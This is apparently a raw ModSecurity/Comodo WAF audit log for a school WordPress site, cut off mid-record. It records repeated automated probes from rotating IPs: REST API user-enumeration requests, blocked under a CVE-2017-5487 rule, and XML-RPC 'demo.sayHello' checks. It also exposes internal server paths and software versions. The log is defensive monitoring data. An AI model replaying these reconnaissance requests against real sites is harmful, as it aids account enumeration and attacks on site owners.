https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0316657e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462421242788 5526 (- - -) Stopwatch2: 1746462421242788 5526; combined=4114, p1=522, p2=3367, p3=32, p4=35, p5=93, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0316657e-Z-- --70d02716-A-- [05/May/2025:23:28:54 +0700] aBjnRk2V_h1VFAgsfgaAOwAAABU 103.236.140.4 58182 103.236.140.4 8181 --70d02716-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.239 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --70d02716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70d02716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462534083860 2989 (- - -) Stopwatch2: 1746462534083860 2989; combined=1311, p1=421, p2=861, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70d02716-Z-- --02fba25a-A-- [05/May/2025:23:28:57 +0700] aBjnSU2V_h1VFAgsfgaAPgAAAAg 103.236.140.4 58202 103.236.140.4 8181 --02fba25a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.239 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.239 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02fba25a-C-- demo.sayHello --02fba25a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02fba25a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462537319173 6021 (- - -) Stopwatch2: 1746462537319173 6021; combined=4362, p1=527, p2=3601, p3=31, p4=35, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02fba25a-Z-- --23cb7b79-A-- [05/May/2025:23:35:04 +0700] aBjouARwKNFSM6B7_LakIgAAAJI 103.236.140.4 33170 103.236.140.4 8181 --23cb7b79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23cb7b79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23cb7b79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462904393858 4185 (- - -) Stopwatch2: 1746462904393858 4185; combined=2091, p1=609, p2=1448, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23cb7b79-Z-- --a314cd16-A-- [05/May/2025:23:35:07 +0700] aBjouwRwKNFSM6B7_LakKAAAAIA 103.236.140.4 33194 103.236.140.4 8181 --a314cd16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a314cd16-C-- demo.sayHello --a314cd16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a314cd16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462907143922 6720 (- - -) Stopwatch2: 1746462907143922 6720; combined=5258, p1=563, p2=4321, p3=50, p4=70, p5=151, sr=79, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a314cd16-Z-- --b06bdb2d-A-- [05/May/2025:23:35:40 +0700] aBjo3PZJDMuQndL03JNhIgAAAEQ 103.236.140.4 33478 103.236.140.4 8181 --b06bdb2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b06bdb2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b06bdb2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746462940024362 2486 (- - -) Stopwatch2: 1746462940024362 2486; combined=1398, p1=452, p2=914, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b06bdb2d-Z-- --ce1f0928-A-- [05/May/2025:23:35:43 +0700] aBjo34ZWvR7-42f6JrAQdgAAAM4 103.236.140.4 33514 103.236.140.4 8181 --ce1f0928-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.102 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ce1f0928-C-- demo.sayHello --ce1f0928-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce1f0928-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746462943205141 5049 (- - -) Stopwatch2: 1746462943205141 5049; combined=3755, p1=527, p2=3025, p3=30, p4=29, p5=84, sr=64, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce1f0928-Z-- --71a1be36-A-- [05/May/2025:23:38:28 +0700] aBjphE2V_h1VFAgsfgaBewAAAAU 103.236.140.4 34948 103.236.140.4 8181 --71a1be36-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71a1be36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a1be36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463108919918 2368 (- - -) Stopwatch2: 1746463108919918 2368; combined=1294, p1=430, p2=834, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71a1be36-Z-- --20928b29-A-- [05/May/2025:23:38:31 +0700] aBjph_ZJDMuQndL03JNhugAAAEg 103.236.140.4 34972 103.236.140.4 8181 --20928b29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.252 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20928b29-C-- demo.sayHello --20928b29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20928b29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463111694221 5581 (- - -) Stopwatch2: 1746463111694221 5581; combined=4235, p1=514, p2=3426, p3=97, p4=66, p5=78, sr=76, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20928b29-Z-- --0fbc4159-A-- [05/May/2025:23:40:01 +0700] aBjp4fZJDMuQndL03JNh4QAAAE8 103.236.140.4 35732 103.236.140.4 8181 --0fbc4159-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fbc4159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fbc4159-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463201735934 2475 (- - -) Stopwatch2: 1746463201735934 2475; combined=1412, p1=474, p2=904, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fbc4159-Z-- --952ad107-A-- [05/May/2025:23:40:04 +0700] aBjp5ARwKNFSM6B7_LakrQAAAJI 103.236.140.4 35768 103.236.140.4 8181 --952ad107-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --952ad107-C-- demo.sayHello --952ad107-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --952ad107-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463204868778 7791 (- - -) Stopwatch2: 1746463204868778 7791; combined=6006, p1=762, p2=4959, p3=51, p4=72, p5=98, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --952ad107-Z-- --3a62134b-A-- [05/May/2025:23:43:39 +0700] aBjqu02V_h1VFAgsfgaCRQAAABY 103.236.140.4 37540 103.236.140.4 8181 --3a62134b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a62134b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a62134b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463419403153 3238 (- - -) Stopwatch2: 1746463419403153 3238; combined=1452, p1=474, p2=947, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a62134b-Z-- --aa79a55a-A-- [05/May/2025:23:43:42 +0700] aBjqvoZWvR7-42f6JrAReAAAANM 103.236.140.4 37576 103.236.140.4 8181 --aa79a55a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa79a55a-C-- demo.sayHello --aa79a55a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa79a55a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463422387124 4563 (- - -) Stopwatch2: 1746463422387124 4563; combined=3703, p1=477, p2=2980, p3=35, p4=37, p5=99, sr=55, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa79a55a-Z-- --737f584f-A-- [05/May/2025:23:44:52 +0700] aBjrBPZJDMuQndL03JNilQAAAFY 103.236.140.4 38136 103.236.140.4 8181 --737f584f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --737f584f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --737f584f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463492604978 2991 (- - -) Stopwatch2: 1746463492604978 2991; combined=1463, p1=476, p2=951, p3=0, p4=0, p5=36, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --737f584f-Z-- --ee948801-A-- [05/May/2025:23:44:55 +0700] aBjrB_ZJDMuQndL03JNimwAAAFQ 103.236.140.4 38156 103.236.140.4 8181 --ee948801-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee948801-C-- demo.sayHello --ee948801-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee948801-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463495329939 6548 (- - -) Stopwatch2: 1746463495329939 6548; combined=4754, p1=618, p2=3890, p3=40, p4=43, p5=98, sr=97, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee948801-Z-- --775a8d08-A-- [05/May/2025:23:45:19 +0700] aBjrH_ZJDMuQndL03JNiwwAAAE0 103.236.140.4 38352 103.236.140.4 8181 --775a8d08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --775a8d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --775a8d08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463519293941 3298 (- - -) Stopwatch2: 1746463519293941 3298; combined=1496, p1=505, p2=958, p3=0, p4=0, p5=33, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --775a8d08-Z-- --3d780809-A-- [05/May/2025:23:45:22 +0700] aBjrIvZJDMuQndL03JNiywAAAFI 103.236.140.4 38380 103.236.140.4 8181 --3d780809-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d780809-C-- demo.sayHello --3d780809-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d780809-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463522028483 5355 (- - -) Stopwatch2: 1746463522028483 5355; combined=4100, p1=514, p2=3343, p3=32, p4=34, p5=103, sr=80, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d780809-Z-- --b4ad365a-A-- [05/May/2025:23:45:22 +0700] aBjrIvZJDMuQndL03JNizQAAAEo 103.236.140.4 38386 103.236.140.4 8181 --b4ad365a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 